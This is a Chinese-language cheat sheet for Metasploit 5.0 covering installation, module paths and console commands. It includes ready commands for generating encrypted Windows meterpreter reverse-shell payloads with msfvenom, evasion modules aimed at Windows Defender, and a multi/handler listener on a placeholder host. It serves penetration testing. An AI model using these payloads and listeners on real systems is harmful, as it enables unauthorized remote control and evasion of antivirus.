install

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall
# 注意:https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb
需要翻墙后黏贴下载安装代码即可.

exploit插件目录

#kali
/usr/share/metasploit-framework/modules/exploit
#ubuntu
/opt/metasploit-framework/embedded/framework/modules/exploits

命令行

  1. 基本命令行
查看所有可用的渗透攻击程序代码
show exploits
查看所有可用的辅助攻击工具
show auxiliary
查看该模块所有可用选项
show options
查看该模块适用的所有载荷代码
show payloads
查看该模块适用的攻击目标类型
show targets
查看免杀模块(5.0新出特性)
show evasion
evasion/windows/windows_defender_exe
evasion/windows/windows_defender_js_hta
  1. generate命令单独生成payload

Usage: generate [options]

Generates a payload. Datastore options may be supplied after normal options.

Example: generate -f python LHOST=127.0.0.1

OPTIONS:

    -E        Force encoding
    -O <opt>  Deprecated: alias for the '-o' option
    -P <opt>  Total desired payload size, auto-produce appropriate NOP sled length
    -S <opt>  The new section name to use when generating (large) Windows binaries
    -b <opt>  The list of characters to avoid example: '\x00\xff'
    -e <opt>  The encoder to use
    -f <opt>  Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
    -h        Show this message
    -i <opt>  The number of times to encode the payload
    -k        Preserve the template behavior and inject the payload as a new thread
    -n <opt>  Prepend a nopsled of [length] size on to the payload
    -o <opt>  The output file name (otherwise stdout)
    -p <opt>  The platform of the payload
    -x <opt>  Specify a custom executable file to use as a template

# show payloads查看自己想生成的payload
# 单独生成windows环境下反向连接的payload,执行后回连本地监听的主机lhost的端口lport
use windows/meterpreter/reverse_tcp
set lhost 1.1.1.1
set lport 4444
generate -f exe 
或
msfvenom -p windows/meterpreter/reverse_tcp lhost=1.1.1.1 lport=444 --encrypt base64
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt-key thisisakey -f c
#添加了四种加密方式,分别为AES256-CBC、RC4、XOR和Base64
  1. 监听本地端口
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost  1.1.1.1
set lport  4444
set ExitOnSession false
exploit -j
或使用handler命令
handler -H 1.1.1.1 -P 4444  -p windows/meterpreter/reverse_tcp
  • 使用handler命令help
Usage: handler [options]

Spin up a Payload Handler as background job.

OPTIONS:

    -H <opt>  The RHOST/LHOST to configure the handler for
    -P <opt>  The RPORT/LPORT to configure the handler for
    -e <opt>  An Encoder to use for Payload Stage Encoding
    -h        Help Banner
    -n <opt>  The custom name to give the handler job
    -p <opt>  The payload to configure the handler for
    -x        Shut the Handler down after a session is established

参考资料:

  1. https://blog.rapid7.com/2019/01/10/metasploit-framework-5-0-released/
  2. https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service